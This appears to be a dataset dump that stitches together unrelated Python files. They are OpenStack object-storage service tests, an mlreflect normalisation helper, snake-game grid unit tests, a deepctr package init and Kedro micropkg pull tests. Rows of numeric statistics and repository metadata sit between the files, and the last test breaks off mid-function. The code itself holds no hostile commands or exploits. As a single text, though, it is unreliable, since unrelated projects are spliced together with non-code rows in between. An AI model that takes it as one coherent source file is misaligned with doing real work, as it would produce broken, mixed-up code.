self.common_handler(operation='mount_status',
data=data,
expected_output=expected_output)
def test_service_availability_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='service_availability',
data=data,
expected_output=expected_output)
def test_service_availability_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='service_availability',
data=data,
expected_output=expected_output)
def test_load_average_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='load_average',
data=data,
expected_output=expected_output)
def test_load_avaergae_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='load_average',
data=data,
expected_output=expected_output)
def test_file_systems(self):
data = self.inst.data_with_cluster_card()
expected_output = {'/dev/mqueue': {'Swiftlm.Test': 2.0}}
self.common_handler(operation='file_systems',
data=data,
expected_output=expected_output)
def test_rate_of_change_card(self):
data = self.inst.data_with_cluster_card()
expected_output = [-32.5]
self.common_handler(operation='rate_of_change',
data=data,
expected_output=expected_output)
def test_rate_of_change_graph(self):
data = self.inst.data_with_cluster_graph()
expected_output = [['2016-08-27T23:41:15.000Z', -26],
['2016-07-28T07:41:15.000Z', 34],
['2016-07-28T11:41:15.000Z', 0],
['2016-07-28T19:41:15.000Z', -32],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15Z', -1]]
self.common_handler(operation='rate_of_change',
data=data,
expected_output=expected_output)
def test_heat_map_cpu_load_average(self):
data = self.inst.data_without_cluster_card()
self.common_handler(operation='heat_map_cpu_load_average',
data=data,
expected_output=[])
def test_alarm_description(self):
data = self.inst.data_with_cluster_card()
expected_output = {'ff43aacc-a5db-4f6f-a5d3-44f9cce8c713':
{'status': 'CRITICAL',
'state': 'ALARM',
'description': 'Alarms',
'alarm_definition_id': '38b3c2b7-efe8',
'name': 'Latency Usage',
'severity': 'HIGH'},
'ff43aacc-a5db-4f6f-a5d3-44f9cce8c715':
{'status': 'CRITICAL',
'state': 'ALARM',
'description': 'Alarms',
'alarm_definition_id': '38b3c2b7-efe8',
'name': 'Latency Usage',
'severity': 'HIGH'},
'ff43aacc-a5db-4f6f-a5d3-44f9cce8c714':
{'status': 'CRITICAL',
'state': 'ALARM',
'description': 'Alarms',
'alarm_definition_id': '38b3c2b7-efe8',
'name': 'Latency Usage',
'severity': 'HIGH'}}
self.common_handler(operation='alarm_description', data=data,
expected_output=expected_output)
def test_heat_map_utilization_focused_inventory(self):
data = self.inst.data_without_cluster_card()
self.common_handler(
operation='heat_map_utilization_focused_inventory',
data=data, expected_output=[])
@patch.object(AlarmsManager, 'count')
@patch.object(objectstorage_summary_service.ObjectStorageSummarySvc,
'call_service')
@patch.object(TokenHelpers, 'get_service_endpoint')
@patch.object(TokenHelpers, 'get_token_for_project')
def test_node_state(self, mock_get_token_for_project,
mock_get_service_endpoint,
mock_call_service,
mock_alarm_count):
mock_get_token_for_project.return_value = "admin"
mock_get_service_endpoint.return_value = "http://localhost:8070/v2.0"
mock_call_service.return_value = {'ccp:cluster1':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt'],
'ccp:cluster2':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt']}
mock_alarm_count.return_value = {"counts":
[[5, "OK", "LOW"],
[6, "ALARM", "CRITICAL"],
[2, "ALARM", "HIGH"],
[3, "ALARM", "LOW"],
[7, "UNDETERMINED", "MED"]]}
request = {
api.TARGET: 'objectstorage_summary_service',
api.ACTION: 'GET',
api.AUTH_TOKEN: 'unused',
api.DATA: {
api.OPERATION: "node_state",
api.DATA: None
}
}
svc = objectstorage_summary_service.ObjectStorageSummarySvc(
bll_request=BllRequest(request))
reply = svc.handle()
self.assertEqual(reply['status'], api.STATUS_INPROGRESS)
@patch.object(AlarmsManager, 'count')
@patch.object(objectstorage_summary_service.ObjectStorageSummarySvc,
'call_service')
@patch.object(TokenHelpers, 'get_service_endpoint')
@patch.object(TokenHelpers, 'get_token_for_project')
def test_health_focused(self, mock_get_token_for_project,
mock_get_service_endpoint,
mock_call_service,
mock_alarm_count):
mock_get_token_for_project.return_value = "admin"
mock_get_service_endpoint.return_value = "http://localhost:8070/v2.0"
mock_call_service.return_value = {'ccp:cluster1':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt'],
'ccp:cluster2':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt']}
mock_alarm_count.return_value = {"counts": [[5, "OK", "LOW"],
[6, "OK", "HIGH"]]}
request = {
api.TARGET: 'objectstorage_summary_service',
api.ACTION: 'GET',
api.AUTH_TOKEN: 'unused',
api.DATA: {
api.OPERATION: "health_focused",
api.DATA: None
}
}
svc = objectstorage_summary_service.ObjectStorageSummarySvc(
bll_request=BllRequest(request))
reply = svc.handle()
self.assertEqual(reply['status'], api.STATUS_INPROGRESS)
@patch.object(objectstorage_summary_service.ObjectStorageSummarySvc,
'call_service')
@patch.object(AlarmsManager, 'list')
@patch.object(AlarmsManager, 'get')
@patch.object(AlarmDefinitionsManager, 'get')
@patch.object(AlarmsManager, 'count')
@patch.object(MetricsManager, 'list')
@patch.object(MetricsManager, 'list_statistics')
@patch.object(MetricsManager, 'list_measurements')
@patch.object(TokenHelpers, 'get_service_endpoint')
@patch.object(TokenHelpers, 'get_token_for_project')
def common_handler(self, mock_get_token_for_project,
mock_get_service_endpoint,
mock_get_measurement_list,
mock_get_statistics_list,
mock_get_list,
mock_get_alarm_count,
mock_get_alarm_definition_get,
mock_get_alarm_get,
mock_get_alarm_list,
mock_call_service,
operation, data, expected_output):
mock_get_token_for_project.return_value = "admin"
mock_get_service_endpoint.return_value = "http://localhost:8070/v2.0"
mock_get_measurement_list.return_value = MEASUREMENT_OUPUT
mock_get_statistics_list.return_value = STATISTICS_OUTPUT
mock_get_list.return_value = METRIC_LIST_OUTPUT
mock_get_alarm_count.return_value = ALARM_COUNT_OUTPUT
mock_get_alarm_definition_get.return_value = \
ALARM_DEFINITION_SHOW_OUTPUT
mock_get_alarm_get.return_value = ALARM_SHOW_OUTPUT
mock_get_alarm_list.return_value = ALARM_LIST_OUTPUT
mock_call_service.return_value = CALL_SERVICE_OUTPUT
request = {
api.TARGET: 'objectstorage_summary_service',
api.ACTION: 'GET',
api.AUTH_TOKEN: 'unused',
api.DATA: {
api.OPERATION: operation,
api.DATA: data
}
}
svc = objectstorage_summary_service.ObjectStorageSummarySvc(
bll_request=BllRequest(request))
reply = svc.handle()
expected = expected_output
self.assertEqual(reply[api.DATA], expected)
def test_project_capacity_metric_card_selected_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 1,
"period": 3600,
"id": "123"}
operation = "project_capacity"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_metric_card_all_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 1,
"period": 3600,
"id": "all"}
operation = "project_capacity"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_time_series_all_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 24,
"period": 3600,
"id": "all"}
operation = "project_capacity"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_time_series_selected_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 24,
"period": 3600,
"id": "123"}
operation = "project_capacity"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_roc_metric_card_selected_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 2,
"period": 3600,
"id": "123"}
operation = "project_capacity_roc"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_roc_metric_card_all_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 2,
"period": 3600,
"id": "all"}
operation = "project_capacity_roc"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_roc_time_series_all_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 24,
"period": 3600,
"id": "all"}
operation = "project_capacity_roc"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_roc_time_series_selected_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 24,
"period": 3600,
"id": "123"}
operation = "project_capacity_roc"
self.project_common_handler(operation=operation, data=data)
def test_topten_project_capacity(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 6,
"period": 3600}
operation = "topten_project_capacity"
self.project_common_handler(operation=operation, data=data)
@patch.object(MetricsManager, 'list_statistics')
@patch.object(objectstorage_summary_service.ObjectStorageSummarySvc,
'call_service')
@patch.object(TokenHelpers, 'get_service_endpoint')
@patch.object(TokenHelpers, 'get_token_for_project')
def project_common_handler(self, mock_get_token_for_project,
mock_get_service_endpoint,
mock_call_service,
mock_list_statistics,
operation, data):
mock_get_token_for_project.return_value = "admin"
mock_get_service_endpoint.return_value = "http://localhost:8070/v2.0"
mock_call_service.return_value = [
{"id": "34c037934d852ea7", "name": "backup"},
{"id": "2e3a733b4559c20f", "name": "demo"}
]
mock_list_statistics.return_value = [
{"dimensions": {"user_id": "None",
"cloud_name": "standard",
"region": "None",
"resource_id": "62d256ae5f1748dab8fedf8ebdf4b802",
"control_plane": "ccp",
"cluster": "cluster1",
"datasource": "ceilometer",
"project_id": "62d256ae5f1748dab8fedf8ebdf4b802",
"type": "gauge",
"unit": "B",
"source": "openstack"},
"statistics": [["2016-07-15T23:00:00.000Z", 300],
["2016-07-16T00:00:00.000Z", 450],
["2016-07-16T01:00:00.000Z", 250],
["2016-07-16T02:00:00.000Z", 500],
["2016-07-16T03:00:00.000Z", 600]
]
}]
request = {
api.TARGET: 'objectstorage_summary_service',
api.ACTION: 'GET',
api.AUTH_TOKEN: 'unused',
api.DATA: {
api.OPERATION: operation,
api.DATA: data,
}
}
svc = objectstorage_summary_service.ObjectStorageSummarySvc(
bll_request=BllRequest(request))
reply = svc.handle()
self.assertEqual(reply['status'], api.STATUS_INPROGRESS)
| 47.087798 | 79 | 0.482634 | 2,918 | 31,643 | 4.988005 | 0.089445 | 0.078873 | 0.031879 | 0.03078 | 0.814428 | 0.791549 | 0.764754 | 0.753006 | 0.738784 | 0.738509 | 0 | 0.108528 | 0.403344 | 31,643 | 671 | 80 | 47.157973 | 0.662394 | 0.002939 | 0 | 0.651888 | 0 | 0 | 0.205725 | 0.086823 | 0 | 0 | 0 | 0 | 0.006568 | 1 | 0.077176 | false | 0 | 0.014778 | 0.00821 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4995a348fa06dc9c2cf2d62fef99d47af3de03bb | 212 | py | Python | mlreflect/xrrloader/footprint/normalization.py | schreiber-lab/mlreflect | 88a80ccac48461cc8934a46041726b70e469c6b8 | [
"MIT"
] | null | null | null | mlreflect/xrrloader/footprint/normalization.py | schreiber-lab/mlreflect | 88a80ccac48461cc8934a46041726b70e469c6b8 | [
"MIT"
] | null | null | null | mlreflect/xrrloader/footprint/normalization.py | schreiber-lab/mlreflect | 88a80ccac48461cc8934a46041726b70e469c6b8 | [
"MIT"
] | null | null | null | import numpy as np
from numpy import ndarray
def normalize_to_max(intensity: ndarray):
return intensity / np.max(intensity)
def normalize_to_first(intensity: ndarray):
return intensity / intensity[0]
| 19.272727 | 43 | 0.768868 | 29 | 212 | 5.482759 | 0.482759 | 0.150943 | 0.176101 | 0.389937 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005618 | 0.160377 | 212 | 10 | 44 | 21.2 | 0.88764 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
b8f4ba3689f43767f473b430a7da90308aba2479 | 12,430 | py | Python | gym_snake/envs/snake/grid_unittests.py | Maarten1999/Minor_ML3_Snake_AI | 8a579634c94feb8f73b9bf00db78d6852993d3f6 | [
"MIT"
] | null | null | null | gym_snake/envs/snake/grid_unittests.py | Maarten1999/Minor_ML3_Snake_AI | 8a579634c94feb8f73b9bf00db78d6852993d3f6 | [
"MIT"
] | null | null | null | gym_snake/envs/snake/grid_unittests.py | Maarten1999/Minor_ML3_Snake_AI | 8a579634c94feb8f73b9bf00db78d6852993d3f6 | [
"MIT"
] | null | null | null | import unittest
from grid import Grid
from snake import Snake
import numpy as np
class GridTests(unittest.TestCase):
grid_size = [30,30]
unit_size = 10
def test_grid_Initialization(self):
grid = Grid(self.grid_size, self.unit_size)
expected_size = [300,300,3]
expected_grid = np.zeros(expected_size, dtype=np.uint8)
expected_grid[:,:,1] = 255
self.assertTrue(np.array_equal(grid.grid, expected_grid))
def test_constant_Initialization(self):
grid = Grid(self.grid_size, self.unit_size)
self.assertTrue(grid.unit_size == self.unit_size)
self.assertTrue(np.array_equal(grid.grid_size, self.grid_size))
def test_color_Initialization(self):
grid = Grid(self.grid_size, self.unit_size)
expected_color = np.array([0,255,0], dtype=np.uint8)
for i in range(grid.grid.shape[0]):
for j in range(grid.grid.shape[1]):
self.assertTrue(np.array_equal(grid.grid[i,j,:],expected_color))
def test_color_of_Color(self):
grid = Grid(self.grid_size, self.unit_size)
expected_color = np.array([0,255,0], dtype=np.uint8)
self.assertTrue(np.array_equal(grid.color_of([0,0]),expected_color))
def test_color_of_Coordinate(self):
grid = Grid(self.grid_size, self.unit_size)
coord = [3,2]
expected_color = np.array(grid.BODY_COLOR, dtype=np.uint8)
grid.grid[coord[1]*self.unit_size,coord[0]*self.unit_size,:] = expected_color
self.assertTrue(np.array_equal(grid.color_of(coord),expected_color))
def test_draw_Positive(self):
grid = Grid(self.grid_size, self.unit_size)
expected_color = np.array(grid.BODY_COLOR, dtype=np.uint8)
coord = [3,2]
grid.draw(coord, expected_color)
for y in range(grid.grid.shape[0]):
for x in range(grid.grid.shape[1]):
if y >= coord[1]*self.unit_size and y < coord[1]*self.unit_size+grid.unit_size-grid.unit_gap and x >= coord[0]*self.unit_size and x < coord[0]*self.unit_size+grid.unit_size-grid.unit_gap:
self.assertTrue(np.array_equal(grid.grid[y,x,:],expected_color))
else:
self.assertFalse(np.array_equal(grid.grid[y,x,:],expected_color))
def test_draw_Negative(self):
grid = Grid(self.grid_size, self.unit_size)
expected_color = grid.SPACE_COLOR
coord = [3,2]
grid.draw(coord, grid.BODY_COLOR)
for y in range(grid.grid.shape[0]):
for x in range(grid.grid.shape[1]):
if y >= coord[1]*self.unit_size and y < coord[1]*self.unit_size+grid.unit_size-grid.unit_gap and x >= coord[0]*self.unit_size and x < coord[0]*self.unit_size+grid.unit_size-grid.unit_gap:
self.assertFalse(np.array_equal(grid.grid[y,x,:],expected_color))
else:
self.assertTrue(np.array_equal(grid.grid[y,x,:],expected_color))
def test_draw_snake_Positive(self):
grid = Grid(self.grid_size, self.unit_size)
snake_size = 3
head_coord = [10,10]
snake = Snake(head_coord, snake_size)
grid.draw_snake(snake, head_color=grid.HEAD_COLOR)
expected_colors = np.array([grid.HEAD_COLOR, grid.BODY_COLOR, grid.BODY_COLOR], dtype=np.uint8)
expected_coords = np.array([[10,10], [10,9], [10,8]])
for coord,color in zip(expected_coords, expected_colors):
self.assertTrue(np.array_equal(grid.color_of(coord), color))
def test_draw_snake_Negative(self):
grid = Grid(self.grid_size, self.unit_size)
snake_size = 3
head_coord = [10,10]
snake = Snake(head_coord, snake_size)
grid.draw_snake(snake, grid.HEAD_COLOR)
expected_color = grid.SPACE_COLOR
expected_coords = [(10,10), (10,9), (10,8)]
for i,j in zip(range(grid.grid_size[0]),range(grid.grid_size[1])):
coord = (i,j)
if coord == expected_coords[0] or coord == expected_coords[1] or coord == expected_coords[2]:
self.assertFalse(np.array_equal(grid.color_of(coord), expected_color))
else:
self.assertTrue(np.array_equal(grid.color_of(coord), expected_color))
def test_draw_snake_Snake_Data(self):
grid = Grid(self.grid_size, self.unit_size)
snake_size = 3
head_coord = [10,10]
snake = Snake(head_coord, snake_size)
grid.draw_snake(snake, grid.HEAD_COLOR)
expected_coords = [[10,8],[10,9]]
for i in range(len(snake.body)):
self.assertTrue(np.array_equal(snake.body.popleft(), expected_coords[i]))
def test_erase_snake_body(self):
grid = Grid(self.grid_size, self.unit_size)
snake_size = 3
head_coord = [10,10]
snake = Snake(head_coord, snake_size)
grid.draw_snake(snake, grid.HEAD_COLOR)
snake.action(1)
grid.erase_snake_body(snake)
expected_color = grid.SPACE_COLOR
for i,j in zip(range(grid.grid_size[0]),range(grid.grid_size[1])):
coord = (i,j)
self.assertTrue(np.array_equal(grid.color_of(coord), expected_color))
def test_new_food(self):
grid = Grid(self.grid_size, self.unit_size)
expected_coord = (10,11)
for x in range(grid.grid_size[0]):
for y in range(grid.grid_size[1]):
coord = (x,y)
if coord != expected_coord:
grid.draw(coord, grid.BODY_COLOR)
self.assertTrue(grid.new_food())
self.assertTrue(np.array_equal(grid.color_of(expected_coord), grid.FOOD_COLOR))
def test_new_food_nospace(self):
grid = Grid(self.grid_size, self.unit_size)
for x in range(grid.grid_size[0]):
for y in range(grid.grid_size[1]):
coord = (x,y)
grid.draw(coord, grid.BODY_COLOR)
self.assertFalse(grid.new_food())
def test_snake_space_BODY(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (10,11)
grid.draw(coord, grid.BODY_COLOR)
self.assertTrue(grid.snake_space(coord))
def test_snake_space_HEAD(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (10,11)
grid.draw(coord, grid.HEAD_COLOR)
self.assertTrue(grid.snake_space(coord))
def test_snake_space_FOOD(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (10,11)
grid.draw(coord, grid.FOOD_COLOR)
self.assertFalse(grid.snake_space(coord))
def test_snake_space_SPACE(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (10,11)
grid.draw(coord, grid.SPACE_COLOR)
self.assertFalse(grid.snake_space(coord))
def test_off_grid_UP(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (0,-1)
self.assertTrue(grid.off_grid(coord))
def test_off_grid_RIGHT(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (self.grid_size[0],0)
self.assertTrue(grid.off_grid(coord))
def test_off_grid_DOWN(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (0,self.grid_size[1])
self.assertTrue(grid.off_grid(coord))
def test_off_grid_LEFT(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (-1,0)
self.assertTrue(grid.off_grid(coord))
def test_food_space_FOOD(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (10,11)
grid.draw(coord, grid.FOOD_COLOR)
self.assertTrue(grid.food_space(coord))
def test_food_space_BODY(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (10,11)
grid.draw(coord, grid.BODY_COLOR)
self.assertFalse(grid.food_space(coord))
def test_food_space_HEAD(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (10,11)
grid.draw(coord, grid.HEAD_COLOR)
self.assertFalse(grid.food_space(coord))
def test_food_space_SPACE(self):
grid = Grid(self.grid_size, self.unit_size)
coord = (10,11)
grid.draw(coord, grid.SPACE_COLOR)
self.assertFalse(grid.food_space(coord))
def test_connect_x(self):
grid = Grid(self.grid_size, self.unit_size)
expected_color = grid.BODY_COLOR
coord1 = [3,2]
coord2 = [4,2]
grid.connect(coord1, coord2, expected_color)
for y in range(grid.grid.shape[0]):
for x in range(grid.grid.shape[1]):
if (y == coord1[1]*self.unit_size or y == coord1[1]*self.unit_size+grid.unit_size-grid.unit_gap-1) and (x < coord2[0]*self.unit_size and x >= coord1[0]*self.unit_size+grid.unit_size-grid.unit_gap):
self.assertTrue(np.array_equal(grid.grid[y,x,:],expected_color))
else:
self.assertFalse(np.array_equal(grid.grid[y,x,:],expected_color))
def test_connect_y(self):
grid = Grid(self.grid_size, self.unit_size)
expected_color = grid.BODY_COLOR
coord1 = [2,3]
coord2 = [2,4]
grid.connect(coord1, coord2, expected_color)
for y in range(grid.grid.shape[0]):
for x in range(grid.grid.shape[1]):
if (x == coord1[0]*self.unit_size or x == coord1[0]*self.unit_size+grid.unit_size-grid.unit_gap-1) and (y < coord2[1]*self.unit_size and y >= coord1[1]*self.unit_size+grid.unit_size-grid.unit_gap):
self.assertTrue(np.array_equal(grid.grid[y,x,:],expected_color))
else:
self.assertFalse(np.array_equal(grid.grid[y,x,:],expected_color))
def test_erase(self):
grid = Grid(self.grid_size, self.unit_size)
coord1 = [2,3]
coord2 = [2,4]
grid.draw(coord1, grid.BODY_COLOR)
grid.draw(coord2, grid.BODY_COLOR)
grid.connect(coord1,coord2)
expected_color = grid.SPACE_COLOR
grid.erase(coord1)
grid.erase(coord2)
for y in range(grid.grid.shape[0]):
for x in range(grid.grid.shape[1]):
self.assertTrue(np.array_equal(grid.grid[y,x,:],expected_color))
def test_erase_connections(self):
grid = Grid(self.grid_size, self.unit_size)
coord1 = [2,3]
coord2 = [2,4]
grid.draw(coord1, grid.BODY_COLOR)
grid.connect(coord1,coord2)
grid.erase_connections(coord1)
for y in range(grid.grid.shape[0]):
for x in range(grid.grid.shape[1]):
if y >= coord1[1]*self.unit_size and y < coord1[1]*self.unit_size+grid.unit_size-grid.unit_gap and x >= coord1[0]*self.unit_size and x < coord1[0]*self.unit_size+grid.unit_size-grid.unit_gap:
self.assertTrue(np.array_equal(grid.grid[y,x,:],grid.BODY_COLOR))
else:
self.assertFalse(np.array_equal(grid.grid[y,x,:],grid.BODY_COLOR))
def test_open_space(self):
grid = Grid([10,10], self.unit_size)
self.assertTrue(grid.open_space == 100)
for i in range(1,10):
grid.draw([i,i], grid.BODY_COLOR)
self.assertTrue(grid.open_space == 100-i)
for i in range(1,10):
grid.erase([i,i])
self.assertTrue(grid.open_space == 91+i)
snake_len = 3
snake = Snake((5,5), snake_len)
grid.draw_snake(snake)
self.assertTrue(grid.open_space == 100-snake_len)
def test_open_space_draw(self):
grid = Grid([10,10], self.unit_size)
for i in range(1,10):
grid.draw([i,i], grid.BODY_COLOR)
self.assertTrue(grid.open_space == 100-i)
def test_open_space_erase(self):
grid = Grid([10,10], self.unit_size)
for i in range(1,10):
grid.erase([i,i])
self.assertTrue(grid.open_space == 100+i)
def test_open_space_draw_snake(self):
grid = Grid([10,10], self.unit_size)
snake_len = 3
snake = Snake((5,5), snake_len)
grid.draw_snake(snake)
self.assertTrue(grid.open_space == 100-snake_len)
def test_open_space_erase_snake_body(self):
grid = Grid([10,10], self.unit_size)
snake_len = 3
snake = Snake((5,5), snake_len)
grid.erase_snake_body(snake)
self.assertTrue(grid.open_space == 100+snake_len-1)
if __name__ == "__main__":
unittest.main()
| 40.888158 | 213 | 0.624055 | 1,831 | 12,430 | 4.022392 | 0.047515 | 0.077122 | 0.092872 | 0.065173 | 0.878072 | 0.847251 | 0.806653 | 0.781399 | 0.762933 | 0.712152 | 0 | 0.031654 | 0.247707 | 12,430 | 303 | 214 | 41.023102 | 0.755962 | 0 | 0 | 0.646154 | 0 | 0 | 0.000644 | 0 | 0 | 0 | 0 | 0 | 0.173077 | 1 | 0.130769 | false | 0 | 0.015385 | 0 | 0.157692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7709a71f9cd643d0ad9f16d72743a68ea6962bc8 | 126 | py | Python | deepctr/layers/__init__.py | osljw/keras_tf | 400f7e8438216ff15e91509472dc028605ed97aa | [
"MIT"
] | null | null | null | deepctr/layers/__init__.py | osljw/keras_tf | 400f7e8438216ff15e91509472dc028605ed97aa | [
"MIT"
] | null | null | null | deepctr/layers/__init__.py | osljw/keras_tf | 400f7e8438216ff15e91509472dc028605ed97aa | [
"MIT"
] | null | null | null | from .core import *
from .interaction import *
from .normalization import *
from .activation import *
from .sequence import *
| 21 | 28 | 0.761905 | 15 | 126 | 6.4 | 0.466667 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15873 | 126 | 5 | 29 | 25.2 | 0.90566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
772f3c7f03d49bf47956f5d9be27a237a1a62995 | 30,725 | py | Python | tests/framework/cli/micropkg/test_micropkg_pull.py | avan-sh/kedro | bb3ca393f6f0e4103f7215aa0f8b4d6bd25efb07 | [
"Apache-2.0"
] | null | null | null | tests/framework/cli/micropkg/test_micropkg_pull.py | avan-sh/kedro | bb3ca393f6f0e4103f7215aa0f8b4d6bd25efb07 | [
"Apache-2.0"
] | null | null | null | tests/framework/cli/micropkg/test_micropkg_pull.py | avan-sh/kedro | bb3ca393f6f0e4103f7215aa0f8b4d6bd25efb07 | [
"Apache-2.0"
] | null | null | null | import filecmp
import shutil
import textwrap
from pathlib import Path
import pytest
import toml
import yaml
from click import ClickException
from click.testing import CliRunner
from kedro.framework.cli.micropkg import _get_sdist_name
from kedro.framework.project import settings
PIPELINE_NAME = "my_pipeline"
def call_pipeline_create(cli, metadata, pipeline_name=PIPELINE_NAME):
result = CliRunner().invoke(
cli, ["pipeline", "create", pipeline_name], obj=metadata
)
assert result.exit_code == 0
def call_micropkg_package(
cli, metadata, alias=None, destination=None, pipeline_name=PIPELINE_NAME
):
options = ["--alias", alias] if alias else []
options += ["--destination", str(destination)] if destination else []
result = CliRunner().invoke(
cli,
["micropkg", "package", f"pipelines.{pipeline_name}", *options],
obj=metadata,
)
assert result.exit_code == 0, result.output
def call_pipeline_delete(cli, metadata, pipeline_name=PIPELINE_NAME):
result = CliRunner().invoke(
cli, ["pipeline", "delete", "-y", pipeline_name], obj=metadata
)
assert result.exit_code == 0
@pytest.mark.usefixtures("chdir_to_dummy_project", "patch_log", "cleanup_dist")
class TestMicropkgPullCommand:
def assert_package_files_exist(self, source_path):
assert {f.name for f in source_path.iterdir()} == {
"__init__.py",
"nodes.py",
"pipeline.py",
"README.md",
}
@pytest.mark.parametrize("env", [None, "local"])
@pytest.mark.parametrize(
"alias, destination",
[
(None, None),
("aliased", None),
("aliased", "pipelines"),
(None, "pipelines"),
],
)
def test_pull_local_sdist(
self,
fake_project_cli,
fake_repo_path,
fake_package_path,
env,
alias,
destination,
fake_metadata,
):
"""Test for pulling a valid sdist file locally."""
# pylint: disable=too-many-locals
call_pipeline_create(fake_project_cli, fake_metadata)
call_micropkg_package(fake_project_cli, fake_metadata)
call_pipeline_delete(fake_project_cli, fake_metadata)
source_path = fake_package_path / "pipelines" / PIPELINE_NAME
config_path = (
fake_repo_path / settings.CONF_SOURCE / "base" / "pipelines" / PIPELINE_NAME
)
test_path = fake_repo_path / "src" / "tests" / "pipelines" / PIPELINE_NAME
# Make sure the files actually deleted before pulling from the sdist file.
assert not source_path.exists()
assert not test_path.exists()
assert not config_path.exists()
sdist_file = (
fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
)
assert sdist_file.is_file()
options = ["-e", env] if env else []
options += ["--alias", alias] if alias else []
options += ["--destination", destination] if destination else []
result = CliRunner().invoke(
fake_project_cli,
["micropkg", "pull", str(sdist_file), *options],
obj=fake_metadata,
)
assert result.exit_code == 0, result.output
assert "pulled and unpacked" in result.output
pipeline_name = alias or PIPELINE_NAME
destination = destination or Path()
source_dest = fake_package_path / destination / pipeline_name
test_dest = fake_repo_path / "src" / "tests" / destination / pipeline_name
config_env = env or "base"
params_config = (
fake_repo_path
/ settings.CONF_SOURCE
/ config_env
/ "parameters"
/ f"{pipeline_name}.yml"
)
self.assert_package_files_exist(source_dest)
assert params_config.is_file()
actual_test_files = {f.name for f in test_dest.iterdir()}
expected_test_files = {"__init__.py", "test_pipeline.py"}
assert actual_test_files == expected_test_files
@pytest.mark.parametrize("env", [None, "local"])
@pytest.mark.parametrize(
"alias, destination",
[
(None, None),
("aliased", None),
("aliased", "pipelines"),
(None, "pipelines"),
],
)
def test_pull_local_sdist_compare(
self,
fake_project_cli,
fake_repo_path,
